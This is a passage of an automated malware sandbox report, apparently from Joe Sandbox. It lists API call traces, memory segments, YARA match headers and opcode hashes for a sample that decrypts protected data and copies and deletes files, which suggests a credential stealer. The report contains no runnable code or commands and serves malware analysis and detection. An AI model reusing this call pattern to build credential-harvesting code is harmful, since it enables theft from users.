                            • Associated: 00000000.00000002.1831572418.0000000000F98000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831744250.0000000000FAA000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831758033.0000000000FAC000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831758033.000000000113C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831758033.000000000121D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831758033.0000000001247000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831758033.000000000124F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831758033.000000000125E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1832014768.000000000125F000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1832134493.0000000001406000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1832149401.0000000001407000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d60000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: BinaryCryptHeapString$AllocateProcess
                            • String ID:
                            • API String ID: 3825993179-0
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,00000104,00000000,00000000,?,?,00000000,00D8A3D0,000000FF), ref: 00D82B8F
                            • RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 00D82B96
                            • GetLocalTime.KERNEL32(?,?,00000000,00D8A3D0,000000FF), ref: 00D82BA2
                            • wsprintfA.USER32 ref: 00D82BCE
                            Memory Dump Source
                            • Source File: 00000000.00000002.1831572418.0000000000D61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateLocalProcessTimewsprintf
                            • String ID:
                            • API String ID: 377395780-0
                            APIs
                            • CryptStringToBinaryA.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 00D69B3B
                            • LocalAlloc.KERNEL32(00000040,00000000), ref: 00D69B4A
                            • CryptStringToBinaryA.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 00D69B61
                            • LocalFree.KERNEL32 ref: 00D69B70
                            Memory Dump Source
                            • Source File: 00000000.00000002.1831572418.0000000000D61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                            Yara matches
                            Similarity
                            • API ID: BinaryCryptLocalString$AllocFree
                            • String ID:
                            • API String ID: 4291131564-0
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1831758033.0000000000FAC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: %>{}$.s;O$hpjy
                            • API String ID: 0-1465181655
                            APIs
                            • CoCreateInstance.COMBASE(00D8B110,00000000,00000001,00D8B100,?), ref: 00D7CB06
                            • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,?,00000104), ref: 00D7CB46
                            • lstrcpyn.KERNEL32(?,?,00000104), ref: 00D7CBC9
                            Memory Dump Source
                            • Source File: 00000000.00000002.1831572418.0000000000D61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                            Yara matches
                            Similarity
                            • API ID: ByteCharCreateInstanceMultiWidelstrcpyn
                            • String ID:
                            • API String ID: 1940255200-0
                            APIs
                            • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00D69B9F
                            • LocalAlloc.KERNEL32(00000040,?), ref: 00D69BB3
                            • LocalFree.KERNEL32(?), ref: 00D69BD7
                            Memory Dump Source
                            • Source File: 00000000.00000002.1831572418.0000000000D61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                            Yara matches
                            Similarity
                            • API ID: Local$AllocCryptDataFreeUnprotect
                            • String ID:
                            • API String ID: 2068576380-0
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1831758033.0000000000FAC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: XG?
                            • API String ID: 0-484424427
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1831758033.0000000000FAC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: B$gF=?
                            • API String ID: 0-3474495741
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1831758033.0000000000FAC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: Jy}
                            • API String ID: 0-3982173206
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1831758033.0000000000FAC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: w~
                            • API String ID: 0-3127576525
                            • Opcode ID: 55f9deb613625ff6a69278fff4a4788c750b5406f563a87eb8835d351534a133
                            • Instruction ID: 02630df6bfd35e99ee21d905df1c035a6ad78a75acd9f79fb6a5bbe3e7a59063
                            • Opcode Fuzzy Hash: 55f9deb613625ff6a69278fff4a4788c750b5406f563a87eb8835d351534a133
                            • Instruction Fuzzy Hash: FF5115B3E182285FE300BE68DC4577AB7D9DB94321F0B8A3DDA94D3784E9395C0482C2
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1831758033.0000000000FAC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                            • Associated: 00000000.00000002.1831559931.0000000000D60000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831572418.0000000000D61000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831572418.0000000000D97000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831572418.0000000000DEE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831572418.0000000000DF6000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831572418.0000000000E0F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831572418.0000000000F98000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831744250.0000000000FAA000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831758033.000000000113C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831758033.000000000121D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831758033.0000000001247000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831758033.000000000124F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831758033.000000000125E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1832014768.000000000125F000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1832134493.0000000001406000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1832149401.0000000001407000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d60000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: +H
                            • API String ID: 0-1675591692
                            • Opcode ID: f9cf297853e441550b4dbe312ba3725aabccb8347359b56d768d41699a3b98d0
                            • Instruction ID: 6fe98b7d4a00e0394855df12e5412c5e2d1e9ebdd4aaa809935816e5bd68cf3d
                            • Opcode Fuzzy Hash: f9cf297853e441550b4dbe312ba3725aabccb8347359b56d768d41699a3b98d0
                            • Instruction Fuzzy Hash: 454138F7908308AFE304BE28EC5477AB7DADB94320F1A893DAAC5C7344F9355D058686
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1831758033.0000000000FAC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                            • Associated: 00000000.00000002.1831559931.0000000000D60000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831572418.0000000000D61000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831572418.0000000000D97000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831572418.0000000000DEE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831572418.0000000000DF6000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831572418.0000000000E0F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831572418.0000000000F98000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831744250.0000000000FAA000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831758033.000000000113C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831758033.000000000121D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831758033.0000000001247000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831758033.000000000124F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831758033.000000000125E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1832014768.000000000125F000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1832134493.0000000001406000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1832149401.0000000001407000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d60000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: ]6n
                            • API String ID: 0-1814913471
                            • Opcode ID: 1a26bd05e310c033c1503a29ff9f6598769bd7b0128bc3f8a32d1df79592049d
                            • Instruction ID: 9ad27e5f3e7f24e0d6cafc60010bf84ee37fdac012de1f6df1571e1d913b4628
                            • Opcode Fuzzy Hash: 1a26bd05e310c033c1503a29ff9f6598769bd7b0128bc3f8a32d1df79592049d
                            • Instruction Fuzzy Hash: 36314FB660C304AFD314EF69DC85A6AFBE9FB58350F12891DE6C4C3A14E73158408B97
                            Memory Dump Source
                            • Source File: 00000000.00000002.1831758033.0000000001247000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                            • Associated: 00000000.00000002.1831559931.0000000000D60000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831572418.0000000000D61000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831572418.0000000000D97000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831572418.0000000000DEE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831572418.0000000000DF6000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831572418.0000000000E0F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831572418.0000000000F98000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831744250.0000000000FAA000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831758033.0000000000FAC000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831758033.000000000113C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831758033.000000000121D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831758033.000000000124F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831758033.000000000125E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1832014768.000000000125F000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1832134493.0000000001406000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1832149401.0000000001407000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d60000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: bb74248d6a81548f3dd9d457a07edf6ba16518b42cc6c9f35b0e4457a4d8b987
                            • Instruction ID: cf708517ac8ede3a95f82c892503c4be3fd5d4908edb4a41f35368aa4ca54c44
                            • Opcode Fuzzy Hash: bb74248d6a81548f3dd9d457a07edf6ba16518b42cc6c9f35b0e4457a4d8b987
                            • Instruction Fuzzy Hash: C8B18BF3A182009FE7145E2CECC576AB7D5EF94320F2A853DEB8497784EA365C058686
                            Memory Dump Source
                            • Source File: 00000000.00000002.1831758033.0000000000FAC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                            • Associated: 00000000.00000002.1831559931.0000000000D60000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831572418.0000000000D61000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831572418.0000000000D97000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831572418.0000000000DEE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831572418.0000000000DF6000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831572418.0000000000E0F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831572418.0000000000F98000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831744250.0000000000FAA000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831758033.000000000113C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831758033.000000000121D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831758033.0000000001247000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831758033.000000000124F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831758033.000000000125E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1832014768.000000000125F000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1832134493.0000000001406000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1832149401.0000000001407000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d60000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 54d15614cc8f04fe9bd88b0460b692d35ca5df11f9ffdf88c42110ad5731e54b
                            • Instruction ID: 92ba817fad18d56c23cd7d412b1011b1eef2b0344101bb4705a74b50a420ecb5
                            • Opcode Fuzzy Hash: 54d15614cc8f04fe9bd88b0460b692d35ca5df11f9ffdf88c42110ad5731e54b
                            • Instruction Fuzzy Hash: 6F6148F3E187145BE3146E2CDC89376BBD5EB94310F0A863DDA8497B88EC39180986C6
                            Memory Dump Source
                            • Source File: 00000000.00000002.1831758033.0000000000FAC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                            • Associated: 00000000.00000002.1831559931.0000000000D60000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831572418.0000000000D61000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831572418.0000000000D97000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831572418.0000000000DEE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831572418.0000000000DF6000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831572418.0000000000E0F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831572418.0000000000F98000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831744250.0000000000FAA000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831758033.000000000113C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831758033.000000000121D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831758033.0000000001247000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831758033.000000000124F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831758033.000000000125E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1832014768.000000000125F000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1832134493.0000000001406000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1832149401.0000000001407000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d60000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 7cdcdae145e084573a21c5b3abcd6779c26ca95c147a8ddc3387ed94fc6d4827
                            • Instruction ID: 3827cf811b941d467defe87e13679bc1b80dc65098ba3f86a7864cc5adcbf429
                            • Opcode Fuzzy Hash: 7cdcdae145e084573a21c5b3abcd6779c26ca95c147a8ddc3387ed94fc6d4827
                            • Instruction Fuzzy Hash: 47513AF36086049BE308AE3DEC8577AB7D6EB94320F1A463EE685C77C4ED3558058296
                            Memory Dump Source
                            • Source File: 00000000.00000002.1831758033.0000000000FAC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                            • Associated: 00000000.00000002.1831559931.0000000000D60000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831572418.0000000000D61000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831572418.0000000000D97000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831572418.0000000000DEE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831572418.0000000000DF6000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831572418.0000000000E0F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831572418.0000000000F98000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831744250.0000000000FAA000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831758033.000000000113C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831758033.000000000121D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831758033.0000000001247000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831758033.000000000124F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831758033.000000000125E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1832014768.000000000125F000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1832134493.0000000001406000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1832149401.0000000001407000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d60000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 3fc0128f9abeb94817f3f6f4dae65cc4a6260236a175e96ae5f807e4d3b71405
                            • Instruction ID: 8e9deb71da0f42030be421a55b7236de62e9fb5105d26816a2b14677c0079c87
                            • Opcode Fuzzy Hash: 3fc0128f9abeb94817f3f6f4dae65cc4a6260236a175e96ae5f807e4d3b71405
                            • Instruction Fuzzy Hash: F251F6F3B082105FF304992CDC4576AB6DADBD4330F2B863DE988E7798E9795C064296
                            Memory Dump Source
                            • Source File: 00000000.00000002.1831758033.000000000113C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                            • Associated: 00000000.00000002.1831559931.0000000000D60000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831572418.0000000000D61000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831572418.0000000000D97000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831572418.0000000000DEE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831572418.0000000000DF6000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831572418.0000000000E0F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831572418.0000000000F98000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831744250.0000000000FAA000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831758033.0000000000FAC000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831758033.000000000121D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831758033.0000000001247000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831758033.000000000124F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831758033.000000000125E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1832014768.000000000125F000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1832134493.0000000001406000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1832149401.0000000001407000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d60000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 01ceead483924fbab3cb6dfc90b17daa406ac469bc55a0818bd8657bf741f1c3
                            • Instruction ID: 8b9e176a617f6e2168d577fe66e8c6050389331c01a169648bb10db8abd6c9f8
                            • Opcode Fuzzy Hash: 01ceead483924fbab3cb6dfc90b17daa406ac469bc55a0818bd8657bf741f1c3
                            • Instruction Fuzzy Hash: 8141BFB260DA00DFD70C6F69E84963EFBE4EB54720F17492EE6D283240E77158818B97
                            APIs
                            • lstrlen.KERNEL32(00000000), ref: 00D78636
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D7866D
                            • lstrcpy.KERNEL32(?,00000000), ref: 00D786AA
                            • StrStrA.SHLWAPI(?,00BFDE38), ref: 00D786CF
                            • lstrcpyn.KERNEL32(00F993D0,?,00000000), ref: 00D786EE
                            • lstrlen.KERNEL32(?), ref: 00D78701
                            • wsprintfA.USER32 ref: 00D78711
                            • lstrcpy.KERNEL32(?,?), ref: 00D78727
                            • StrStrA.SHLWAPI(?,00BFDEB0), ref: 00D78754
                            • lstrcpy.KERNEL32(?,00F993D0), ref: 00D787B4
                            • StrStrA.SHLWAPI(?,00BFDEF8), ref: 00D787E1
                            • lstrcpyn.KERNEL32(00F993D0,?,00000000), ref: 00D78800
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1831572418.0000000000D61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                            • Associated: 00000000.00000002.1831559931.0000000000D60000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831572418.0000000000D97000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831572418.0000000000DEE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831572418.0000000000DF6000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831572418.0000000000E0F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831572418.0000000000F98000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831744250.0000000000FAA000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831758033.0000000000FAC000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831758033.000000000113C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831758033.000000000121D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831758033.0000000001247000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831758033.000000000124F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831758033.000000000125E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1832014768.000000000125F000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1832134493.0000000001406000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1832149401.0000000001407000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d60000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrcpynlstrlen$wsprintf
                            • String ID: %s%s
                            • API String ID: 2672039231-3252725368
                            • Opcode ID: 147652bc4c6b3a420c62e723aa8346f717d900a46a4abd8d6b5e7962e506e87d
                            • Instruction ID: 1690dbb8c7e60a734eea3e0932048177e8dc4eca43f7d5b8a4b482d31dc55f72
                            • Opcode Fuzzy Hash: 147652bc4c6b3a420c62e723aa8346f717d900a46a4abd8d6b5e7962e506e87d
                            • Instruction Fuzzy Hash: 37F19E71905118AFDB10DFA8DC48EAAB7B9EF48340F15415AF909E3251EB70AE05EBB0
                            APIs
                            • lstrcpy.KERNEL32(00000000,00D8CFEC), ref: 00D61F9F
                            • lstrlen.KERNEL32(00BF8F90), ref: 00D61FAE
                            • lstrcpy.KERNEL32(00000000,?), ref: 00D61FDB
                            • lstrcat.KERNEL32(00000000,?), ref: 00D61FE3
                            • lstrlen.KERNEL32(00D91794), ref: 00D61FEE
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D6200E
                            • lstrcat.KERNEL32(00000000,00D91794), ref: 00D6201A
                            • lstrcpy.KERNEL32(00000000,?), ref: 00D62042
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00D6204D
                            • lstrlen.KERNEL32(00D91794), ref: 00D62058
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D62075
                            • lstrcat.KERNEL32(00000000,00D91794), ref: 00D62081
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D620AC
                            • lstrlen.KERNEL32(?), ref: 00D620E4
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D62104
                            • lstrcat.KERNEL32(00000000,?), ref: 00D62112
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D62139
                            • lstrlen.KERNEL32(00D91794), ref: 00D6214B
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D6216B
                            • lstrcat.KERNEL32(00000000,00D91794), ref: 00D62177
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D6219D
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00D621A8
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D621D4
                            • lstrlen.KERNEL32(?), ref: 00D621EA
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D6220A
                            • lstrcat.KERNEL32(00000000,?), ref: 00D62218
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D62242
                            • lstrcpy.KERNEL32(00000000,00D8CFEC), ref: 00D6227F
                            • lstrlen.KERNEL32(00BFCD98), ref: 00D6228D
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D622B1
                            • lstrcat.KERNEL32(00000000,00BFCD98), ref: 00D622B9
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D622F7
                            • lstrcat.KERNEL32(00000000), ref: 00D62304
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D6232D
                            • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00D62356
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D62382
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D623BF
                            • DeleteFileA.KERNEL32(00000000), ref: 00D623F7
                            • FindNextFileA.KERNEL32(00000000,?), ref: 00D62444
                            • FindClose.KERNEL32(00000000), ref: 00D62453
                            Memory Dump Source
                            • Source File: 00000000.00000002.1831572418.0000000000D61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                            • Associated: 00000000.00000002.1831559931.0000000000D60000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831572418.0000000000D97000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831572418.0000000000DEE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831572418.0000000000DF6000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831572418.0000000000E0F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831572418.0000000000F98000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831744250.0000000000FAA000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831758033.0000000000FAC000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831758033.000000000113C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831758033.000000000121D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831758033.0000000001247000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831758033.000000000124F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831758033.000000000125E000.00000040.00000001.01000000.00000003.sdmp
